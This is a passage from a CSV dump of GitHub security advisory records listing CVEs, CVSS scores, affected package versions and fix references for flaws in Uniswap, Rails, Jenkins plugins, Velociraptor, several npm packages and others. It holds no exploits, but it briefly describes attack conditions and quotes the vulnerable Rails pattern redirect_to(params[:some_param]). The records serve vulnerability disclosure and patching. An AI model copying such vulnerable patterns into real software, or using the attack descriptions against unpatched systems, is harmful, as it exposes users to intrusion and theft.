Incorrect Authorization vulnerability,Uniswap Universal Router before 1.1.0 mishandles reentrancy. This would have allowed theft of funds.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@uniswap/universal-router'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48216'}, {'type': 'WEB', 'url': 'https://github.com/Uniswap/universal-router/pull/189'}, {'type': 'WEB', 'url': 'https://github.com/Uniswap/universal-router/commit/d82c6685ef566d9b280651c99f4b93a8454c08a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/Uniswap/universal-router'}, {'type': 'WEB', 'url': 'https://github.com/Uniswap/universal-router/compare/v1.0.1...v1.1.0'}, {'type': 'WEB', 'url': 'https://media.dedaub.com/uniswap-bug-bounty-1625d8ff04ae'}, {'type': 'WEB', 'url': 'https://twitter.com/dedaub/status/1610058814094450694'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T23:47:54Z', 'nvd_published_at': '2023-01-04T16:15:00Z'}" 1.4.0,GHSA-9c64-x3cx-vgmm,2023-01-23T20:35:23Z,2023-01-23T15:30:33Z,,['CVE-2023-0438'],Cross-Site Request Forgery in modoboa,Cross-Site Request Forgery (CSRF) in GitHub repository modoboa/modoboa prior to 2.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0438'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/38d778cc71e370216e067d054ce0169ad83078c8'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/07a5b61b-306d-47c4-8ff0-06c540c7dfb3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-23T20:35:23Z', 'nvd_published_at': '2023-01-23T14:15:00Z'}" 1.4.0,GHSA-g5vm-525q-r66c,2023-02-01T01:37:19Z,2023-01-18T21:30:21Z,,['CVE-2023-0242'],Velociraptor vulnerable to Missing Authorization,"Rapid7 Velociraptor allows users to be created with different privileges on the server. Administrators are generally allowed to run any command on the server including writing arbitrary files. However, lower privilege users are generally forbidden from writing or modifying files on the server. The VQL copy() function applies permission checks for reading files but does not check for permission to write files. This allows a low privilege user (usually, users with the Velociraptor ""investigator"" role) to overwrite files on the server, including Velociraptor configuration files. To exploit this vulnerability, the attacker must already have a Velociraptor user account at a low privilege level (at least ""analyst"") and be able to log into the GUI and create a notebook where they can run the VQL query invoking the copy() VQL function. Typically, most users deploy Velociraptor with limited access to a trusted group (most users will be administrators within the GUI). This vulnerability is associated with program files https://github.Com/Velocidex/velociraptor/blob/master/vql/filesystem/copy.go https://github.Com/Velocidex/velociraptor/blob/master/vql/filesystem/copy.go and program routines copy(). This issue affects Velociraptor versions before 0.6.7-5. Version 0.6.7-5, released January 16, 2023, fixes the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'www.velocidex.com/golang/velociraptor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.7-5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0242'}, {'type': 'WEB', 'url': 'https://docs.velociraptor.app/announcements/2023-cves/#:~:text=to%20upgrade%20clients.-,CVE%2D2023%2D0242,-Insufficient%20Permission%20Check'}, {'type': 'PACKAGE', 'url': 'https://github.com/Velocidex/velociraptor'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:37:19Z', 'nvd_published_at': '2023-01-18T21:15:00Z'}" 1.4.0,GHSA-9445-4cr6-336r,2023-06-26T22:33:39Z,2023-01-18T18:21:23Z,,['CVE-2023-22797'],Open Redirect Vulnerability in Action Pack,"There is a vulnerability in Action Controller’s redirect_to. This vulnerability has been assigned the CVE identifier CVE-2023-22797. Versions Affected: >= 7.0.0 Not affected: < 7.0.0 Fixed Versions: 7.0.4.1 Impact There is a possible open redirect when using the redirect_to helper with untrusted user input. Vulnerable code will look like this: ``` redirect_to(params[:some_param]) ``` Rails 7.0 introduced protection against open redirects from calling redirect_to with untrusted user input. In prior versions the developer was fully responsible for only providing trusted input. However the check introduced could be bypassed by a carefully crafted URL. All users running an affected release should either upgrade or use one of the workarounds immediately. Releases The FIXED releases are available at the normal locations. Workarounds There are no feasible workarounds for this issue. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. 7-0-Fix-sec-issue-with-_url_host_allowed.patch - Patch for 7.0 series Please note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22797'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-22799-possible-redos-based-dos-vulnerability-in-globalid/82127'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v7.0.4.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2023-22797.yml'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-18T18:21:23Z', 'nvd_published_at': '2023-02-09T20:15:00Z'}" 1.4.0,GHSA-6j27-3xfw-cj2w,2023-02-06T16:41:08Z,2023-01-26T21:30:18Z,,['CVE-2023-24438'],Missing permissions check in Jenkins JIRA Pipeline Steps Plugin,"A missing permission check in Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:jira-steps'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.165.v8846cf59f3db'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24438'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2786'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:08:29Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-9mjx-wfqp-j5ph,2023-01-10T21:42:15Z,2023-01-04T18:30:59Z,,['CVE-2022-25926'],window-control vulnerable to Command Injection due to improper input sanitization,window-control is an npm package that provides tools to manage window focus. Versions before 1.4.5 are vulnerable to Command Injection via the `sendKeys` function due to improper input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'window-control'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25926'}, {'type': 'WEB', 'url': 'https://github.com/bruno-robert/window-control/commit/075c854534a749d887655a906759f5a7eee95173'}, {'type': 'PACKAGE', 'url': 'https://github.com/bruno-robert/window-control'}, {'type': 'WEB', 'url': 'https://github.com/bruno-robert/window-control/releases/tag/v1.4.5'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-WINDOWCONTROL-3186345'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-06T21:39:16Z', 'nvd_published_at': '2023-01-04T18:15:00Z'}" 1.4.0,GHSA-wqqv-jcfr-9f5g,2023-01-09T20:07:27Z,2023-01-09T20:07:27Z,,[],"PocketMine-MP has improperly handled dye colour IDs in banner NBT, leading to server crash","### Impact `DyeColorIdMap->fromId()` did not account for the possibility that it might be given invalid input. This means that an undefined offset error would occur whenever this happened. This code is indirectly called during [`Banner->deserializeCompoundTag()`](https://github.com/pmmp/PocketMine-MP/blob/38d6284671e8b657ba557e765a6c29b24a7705f5/src/item/Banner.php#L104), which is invoked when deserializing any item NBT, whether from network or disk. An attacker could use this bug to crash a server by providing NBT with invalid values for pattern colours in an inventory transaction, or by using `/give` to obtain an item with NBT like this. ### Patches 08b9495bce2d65a6d1d3eeb76e484499a00765eb ### Workarounds This is quite difficult to work around via a plugin. Theoretically, it's possible to override the `Banner` item class from a plugin and validate the data before it reaches `deserializeCompoundTag()`. ### For more information If you have any questions or comments about this advisory: * Email us at [security@pmmp.io](mailto:security@pmmp.io) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.8.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-wqqv-jcfr-9f5g'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/commit/08b9495bce2d65a6d1d3eeb76e484499a00765eb'}, {'type': 'PACKAGE', 'url': 'https://github.com/pmmp/PocketMine-MP'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/blob/38d6284671e8b657ba557e765a6c29b24a7705f5/src/item/Banner.php#L104'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T20:07:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-wxgh-8gmr-3qh3,2023-01-12T23:43:03Z,2023-01-07T18:30:20Z,,['CVE-2021-4306'],terminal-kit Inefficient Regular Expression Complexity vulnerability,A vulnerability classified as problematic has been found in cronvel terminal-kit up to 2.1.7. Affected is an unknown function. The manipulation leads to inefficient regular expression complexity. Upgrading to version 2.1.8 can address this issue. The name of the patch is a2e446cc3927b559d0281683feb9b821e83b758c. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217620.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'terminal-kit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-4306'}, {'type': 'WEB', 'url': 'https://github.com/cronvel/terminal-kit/commit/a2e446cc3927b559d0281683feb9b821e83b758c'}, {'type': 'PACKAGE', 'url': 'https://github.com/cronvel/terminal-kit'}, {'type': 'WEB', 'url': 'https://github.com/cronvel/terminal-kit/releases/tag/v2.1.8'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217620'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217620'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T23:43:03Z', 'nvd_published_at': '2023-01-07T17:15:00Z'}" 1.4.0,GHSA-xj9v-6q2f-vqhx,2023-01-13T17:15:16Z,2023-01-09T06:30:26Z,,['CVE-2022-25890'],wifey vulnerable to Command Injection due to improper input sanitization,All versions of the package wifey are vulnerable to Command Injection via the `connect()` function due to improper input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wifey'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25890'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-WIFEY-3175615'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:56:33Z', 'nvd_published_at': '2023-01-09T05:15:00Z'}" 1.4.0,GHSA-qgjq-hrhg-f24h,2023-02-03T20:39:23Z,2023-01-26T21:30:18Z,,['CVE-2023-24448'],Missing permission check in Jenkins RabbitMQ Consumer Plugin,A missing permission check in Jenkins RabbitMQ Consumer Plugin 2.8 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified AMQP(S) URL using attacker-specified username and password.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:rabbitmq-consumer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24448'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2778'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:19:28Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-88v8-v46g-6c9w,2023-02-07T23:22:49Z,2023-01-30T06:30:27Z,,['CVE-2022-25936'],Servst vulnerable to Path Traversal,Versions of the package servst before 2.0.3 are vulnerable to Directory Traversal due to improper sanitization of the filePath variable.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'servst'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25936'}, {'type': 'WEB', 'url': 'https://github.com/andrepolischuk/servst/commit/f7cae5d2d7c64c86bc512e1e50614240396ef114'}, {'type': 'WEB', 'url': 'https://gist.github.com/lirantal/691d02d607753d54856f9335f9a1692f'}, {'type': 'PACKAGE', 'url': 'https://github.com/andrepolischuk/servst'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SERVST-3244896'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:38:11Z', 'nvd_published_at': '2023-01-30T05:15:00Z'}" 1.4.0,GHSA-q3rm-f527-ghxj,2023-01-23T18:52:01Z,2023-01-14T15:30:24Z,,['CVE-2023-0299'],Publify Improper Input Validation vulnerability,Improper Input Validation in GitHub repository publify/publify prior to 9.2.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'publify_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.2.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0299'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify/commit/ca46da283572b4f8c0b5aa245008756c8a5fd1b1'}, {'type': 'WEB', 'url': 'https://github.com/publify/publify_core/commit/34f6e9c98e0e3b3f9896f9676b3d6442220e2b4e'}, {'type': 'PACKAGE', 'url': 'https://github.com/publify/publify'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/publify_core/CVE-2023-0299.yml'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0049774b-1857-46dc-a834-f1fb15138c53'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T21:50:45Z', 'nvd_published_at': '2023-01-14T15:15:00Z'}" 1.4.0,GHSA-6hg4-vp5q-47mw,2023-01-20T23:34:05Z,2023-01-20T23:34:05Z,,[],CakePHP allows direct access of prefixed controller actions,Unconventional URL paths would allow direct access to prefixed actions without setting the correct request parameters.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.99'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.11'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'cakephp/cakephp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/commit/056f24a77428ad35e23cab6840a72b7c25c4ccc0'}, {'type': 'WEB', 'url': 'https://bakery.cakephp.org/2015/08/06/cakephp_2_5_9_2_6_10_2_7_2_released.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/cakephp/cakephp/2015-08-06.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/cakephp/cakephp'}, {'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/releases/tag/2.5.9'}, {'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/releases/tag/2.6.11'}, {'type': 'WEB', 'url': 'https://github.com/cakephp/cakephp/releases/tag/2.7.2'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:34:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-6jmx-pv77-wm5w,2023-02-01T09:20:27Z,2023-01-23T00:30:26Z,,['CVE-2023-0435'],Excessive Attack Surface in pyload-ng,Excessive Attack Surface in GitHub repository pyload/pyload prior to 0.5.0b3.dev41.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyload-ng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0b3.dev41'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0435'}, {'type': 'WEB', 'url': 'https://github.com/pyload/pyload/commit/431ea6f0371d748df66b344a05ca1a8e0310cff3'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyload/pyload'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a3e32ad5-caee-4f43-b10a-4a876d4e3f1d'}]","{'cwe_ids': ['CWE-1125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-23T20:40:31Z', 'nvd_published_at': '2023-01-22T22:15:00Z'}" 1.4.0,GHSA-hcvf-pfrm-jxgf,2023-02-02T23:17:24Z,2023-01-26T21:30:18Z,,['CVE-2023-24451'],Cisco Spark Notifier Jenkins Plugin contains Missing Authorization,A missing permission check in Jenkins Cisco Spark Notifier Plugin 1.1.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:cisco-spark-notifier-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24451'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/cisco-spark-notifier-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2803'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T23:17:24Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-c6rx-gxqv-vr5j,2023-02-07T21:14:50Z,2023-01-31T06:30:26Z,,['CVE-2022-21129'],nemo-appium vulnerable to OS Command Injection,"Versions of the package nemo-appium before 0.0.9 are vulnerable to Command Injection due to improper input sanitization in the 'module.exports.setup' function. **Note:** In order to exploit this vulnerability appium-running 0.1.3 has to be installed as one of nemo-appium dependencies.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nemo-appium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-21129'}, {'type': 'WEB', 'url': 'https://github.com/paypal/nemo-appium/commit/aa271d36dd5c81baae3c43aa2616c84f0ee4195f'}, {'type': 'PACKAGE', 'url': 'https://github.com/paypal/nemo-appium'}, {'type': 'WEB', 'url': 'https://github.com/paypal/nemo-appium/blob/master/index.js%23L27'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-NEMOAPPIUM-3183747'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T23:47:58Z', 'nvd_published_at': '2023-01-31T05:15:00Z'}" 1.4.0,GHSA-fxg5-wq6x-vr4w,2023-01-24T18:56:46Z,2023-01-14T00:30:23Z,,['CVE-2022-41721'],golang.org/x/net/http2/h2c vulnerable to request smuggling attack,"A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'golang.org/x/net/http2/h2c'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0-20220524220425-1d687d428aca'}, {'fixed': '0.1.1-0.20221104162952-702349b0e862'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'golang.org/x/net'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0-20220524220425-1d687d428aca'}, {'fixed': '0.1.1-0.20221104162952-702349b0e862'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41721'}, {'type': 'PACKAGE', 'url': 'https://cs.opensource.google/go/x/net'}, {'type': 'WEB', 'url': 'https://go.dev/cl/447396'}, {'type': 'WEB', 'url': 'https://go.dev/issue/56352'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X3H3EWQXM2XL5AGBX6UL443JEJ3GQXJN/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1495'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T22:40:06Z', 'nvd_published_at': '2023-01-13T23:15:00Z'}" 1.4.0,GHSA-pphf-gfrm-v32r,2023-01-25T02:56:35Z,2023-01-17T12:30:33Z,,['CVE-2022-47318'],Code injection in ruby git,ruby-git versions prior to v1.13.0 allows a remote authenticated attacker to execute an arbitrary ruby code by having a user to load a repository containing a specially crafted filename to the product. This vulnerability is different from CVE-2022-46648.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'git'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47318'}, {'type': 'WEB', 'url': 'https://github.com/ruby-git/ruby-git/pull/602'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby-git/ruby-git'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN16765254/index.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00043.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KPFLSZPUM7APWVBRM5DCAY5OUVQBF4K/'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-25T02:56:35Z', 'nvd_published_at': '2023-01-17T10:15:00Z'}" 1.4.0,GHSA-4x65-4fjx-r7m6,2023-02-03T20:39:15Z,2023-01-26T21:30:18Z,,['CVE-2023-24442'],Plaintext storage of Access Token in Jenkins GitHub Pull Request Coverage Status Plugin,"Jenkins GitHub Pull Request Coverage Status Plugin 2.2.0 and earlier stores the GitHub Personal Access Token, Sonar access token and Sonar password unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:github-pr-coverage-status'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24442'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2767'}]","{'cwe_ids': ['CWE-256', 'CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:03:17Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-fgwp-pwqq-g3w4,2023-01-20T22:03:45Z,2023-01-12T18:30:28Z,,['CVE-2023-0247'],Bloom Uncontrolled Search Path Element vulnerability,Uncontrolled Search Path Element in GitHub repository bits-and-blooms/bloom prior to 3.3.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/bits-and-blooms/bloom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0247'}, {'type': 'WEB', 'url': 'https://github.com/bits-and-blooms/bloom/commit/658f1393d4c52254a3d22f5f64f217405ec5fefb'}, {'type': 'PACKAGE', 'url': 'https://github.com/bits-and-blooms/bloom'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cab50e44-0995-4ac1-a5d5-889293b9704f'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T23:41:33Z', 'nvd_published_at': 